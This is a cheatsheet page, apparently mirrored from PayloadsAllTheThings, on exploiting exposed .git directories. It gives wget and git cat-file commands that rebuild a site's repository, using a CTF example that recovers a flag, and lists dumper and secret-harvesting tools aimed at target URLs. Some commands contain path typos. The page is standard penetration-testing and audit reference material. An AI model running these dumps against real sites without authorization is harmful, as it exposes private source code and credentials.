daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

git.md (8768B)


      1 ---
      2 title: "Git"
      3 topic: "Insecure Source Code Management"
      4 topicSlug: "insecure-source-code-management"
      5 sourcePath: "Insecure Source Code Management/Git.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Insecure%20Source%20Code%20Management/Git.md"
      7 sha: "3ac27901c711"
      8 isReadme: false
      9 ---
     10 
     11 # Git
     12 
     13 ## Summary
     14 
     15 * [Methodology](#methodology)
     16     * [Recovering file contents from .git/logs/HEAD](#recovering-file-contents-from-gitlogshead)
     17     * [Recovering file contents from .git/index](#recovering-file-contents-from-gitindex)
     18 * [Tools](#tools)
     19     * [Automatic recovery](#automatic-recovery)
     20         * [git-dumper.py](#git-dumperpy)
     21         * [diggit.py](#diggitpy)
     22         * [GoGitDumper](#gogitdumper)
     23         * [rip-git](#rip-git)
     24         * [GitHack](#githack)
     25         * [GitTools](#gittools)
     26     * [Harvesting secrets](#harvesting-secrets)
     27         * [noseyparker](#noseyparker)
     28         * [trufflehog](#trufflehog)
     29         * [Yar](#yar)
     30         * [Gitrob](#gitrob)
     31         * [Gitleaks](#gitleaks)
     32 * [References](#references)
     33 
     34 ## Methodology
     35 
     36 The following examples will create either a copy of the .git or a copy of the current commit.
     37 
     38 Check for the following files, if they exist you can extract the .git folder.
     39 
     40 * `.git/config`
     41 * `.git/HEAD`
     42 * `.git/logs/HEAD`
     43 
     44 ### Recovering file contents from .git/logs/HEAD
     45 
     46 * Check for 403 Forbidden or directory listing to find the `/.git/` directory
     47 * Git saves all information in `.git/logs/HEAD` (try lowercase `head` too)
     48 
     49   ```powershell
     50   0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000        clone: from https://github.com/fermayo/hello-world-lamp.git
     51   15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000        commit: Initial.
     52   26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000        commit: Whoops! Remove flag.
     53   6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000        commit: Prevent directory listing.
     54   ```
     55 
     56 * Access the commit using the hash
     57 
     58   ```powershell
     59   # create an empty .git repository
     60   git init test
     61   cd test/.git
     62 
     63   # download the file
     64   wget http://web.site/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
     65 
     66   # first byte for subdirectory, remaining bytes for filename
     67   mkdir .git/object/26
     68   mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
     69 
     70   # display the file
     71   git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
     72       tree 323240a3983045cdc0dec2e88c1358e7998f2e39
     73       parent 15ca375e54f056a576905b41a417b413c57df6eb
     74       author Michael <michael@easyctf.com> 1489390329 +0000
     75       committer Michael <michael@easyctf.com> 1489390329 +0000
     76       Initial.
     77   ```
     78 
     79 * Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
     80 
     81     ```powershell
     82     wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
     83     mkdir .git/object/32
     84     mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
     85 
     86     git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
     87         040000 tree bd083286051cd869ee6485a3046b9935fbd127c0        css
     88         100644 blob cb6139863967a752f3402b3975e97a84d152fd8f        flag.txt
     89         040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97        fonts
     90         100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1        index.html
     91         040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8        js
     92     ```
     93 
     94 * Read the data (flag.txt)
     95 
     96   ```powershell
     97   wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
     98   mkdir .git/object/cb
     99   mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
    100   git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
    101   ```
    102 
    103 ### Recovering file contents from .git/index
    104 
    105 Use the git index file parser <https://pypi.python.org/pypi/gin> (python3).
    106 
    107 ```powershell
    108 pip3 install gin
    109 gin ~/git-repo/.git/index
    110 ```
    111 
    112 Recover name and sha1 hash of every file listed in the index, and use the same process above to recover the file.
    113 
    114 ```powershell
    115 $ gin .git/index | egrep -e "name|sha1"
    116 name = AWS Amazon Bucket S3/README.md
    117 sha1 = 862a3e58d138d6809405aa062249487bee074b98
    118 
    119 name = CRLF injection/README.md
    120 sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
    121 ```
    122 
    123 ## Tools
    124 
    125 ### Automatic recovery
    126 
    127 #### git-dumper.py
    128 
    129 * [arthaud/git-dumper](https://github.com/arthaud/git-dumper)
    130 
    131 ```powershell
    132 pip install -r requirements.txt
    133 ./git-dumper.py http://web.site/.git ~/website
    134 ```
    135 
    136 #### diggit.py
    137 
    138 * [bl4de/security-tools/diggit](https://github.com/bl4de/security-tools/)
    139 
    140 ```powershell
    141 ./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
    142 ./diggit.py -u http://web.site -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1
    143 ```
    144 
    145 `-u` is remote path, where .git folder exists  
    146 `-t` is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (`cd /path/to/temp/folder && git init`)  
    147 `-o` is a hash of particular Git object to download
    148 
    149 #### GoGitDumper
    150 
    151 * [c-sto/gogitdumper](https://github.com/c-sto/gogitdumper)
    152 
    153 ```powershell
    154 go get github.com/c-sto/gogitdumper
    155 gogitdumper -u http://web.site/.git/ -o yourdecideddir/.git/
    156 git log
    157 git checkout
    158 ```
    159 
    160 #### rip-git
    161 
    162 * [kost/dvcs-ripper](https://github.com/kost/dvcs-ripper)
    163 
    164 ```powershell
    165 perl rip-git.pl -v -u "http://web.site/.git/"
    166 
    167 git cat-file -p 07603070376d63d911f608120eb4b5489b507692
    168 tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
    169 parent 15ca375e54f056a576905b41a417b413c57df6eb
    170 author Michael <michael@easyctf.com> 1489389105 +0000
    171 committer Michael <michael@easyctf.com> 1489389105 +0000
    172 
    173 git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
    174 ```
    175 
    176 #### GitHack
    177 
    178 * [lijiejie/GitHack](https://github.com/lijiejie/GitHack)
    179 
    180 ```powershell
    181 GitHack.py http://web.site/.git/
    182 ```
    183 
    184 #### GitTools
    185 
    186 * [internetwache/GitTools](https://github.com/internetwache/GitTools)
    187 
    188 ```powershell
    189 ./gitdumper.sh http://target.tld/.git/ /tmp/destdir
    190 git checkout -- .
    191 ```
    192 
    193 ### Harvesting secrets
    194 
    195 #### noseyparker
    196 
    197 > [praetorian-inc/noseyparker](https://github.com/praetorian-inc/noseyparker) - Nosey Parker is a command-line tool that finds secrets and sensitive information in textual data and Git history.
    198 
    199 ```ps1
    200 git clone https://github.com/trufflesecurity/test_keys
    201 docker run -v "$PWD":/scan ghcr.io/praetorian-inc/noseyparker:latest scan --datastore datastore.np ./test_keys/
    202 docker run -v "$PWD":/scan ghcr.io/praetorian-inc/noseyparker:latest report --color always
    203 noseyparker scan --datastore np.noseyparker --git-url https://github.com/praetorian-inc/noseyparker
    204 noseyparker scan --datastore np.noseyparker --github-user octocat
    205 ```
    206 
    207 #### trufflehog
    208 
    209 > Searches through git repositories for high entropy strings and secrets, digging deep into commit history.
    210 
    211 ```powershell
    212 pip install truffleHog
    213 truffleHog --regex --entropy=False https://github.com/trufflesecurity/trufflehog.git
    214 ```
    215 
    216 #### Yar
    217 
    218 > Searches through users/organizations git repositories for secrets either by regex, entropy or both. Inspired by the infamous truffleHog.
    219 
    220 ```powershell
    221 go get github.com/nielsing/yar # https://github.com/nielsing/yar
    222 yar -o orgname --both
    223 ```
    224 
    225 #### Gitrob
    226 
    227 > Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.
    228 
    229 ```powershell
    230 go get github.com/michenriksen/gitrob # https://github.com/michenriksen/gitrob
    231 export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
    232 gitrob [options] target [target2] ... [targetN]
    233 ```
    234 
    235 #### Gitleaks
    236 
    237 > Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories.
    238 
    239 * Run gitleaks against a public repository
    240 
    241     ```powershell
    242     docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git
    243     ```
    244 
    245 * Run gitleaks against a local repository already cloned into /tmp/
    246 
    247     ```powershell
    248     docker run --rm --name=gitleaks -v /tmp/:/code/  zricethezav/gitleaks -v --repo-path=/code/gitleaks
    249     ```
    250 
    251 * Run gitleaks against a specific Github Pull request
    252 
    253     ```powershell
    254     docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000
    255     ```
    256 
    257 ## References
    258 
    259 * [Gitrob: Now in Go - Michael Henriksen - January 24, 2024](https://web.archive.org/web/20240930092732/https://michenriksen.com/blog/gitrob-now-in-go/)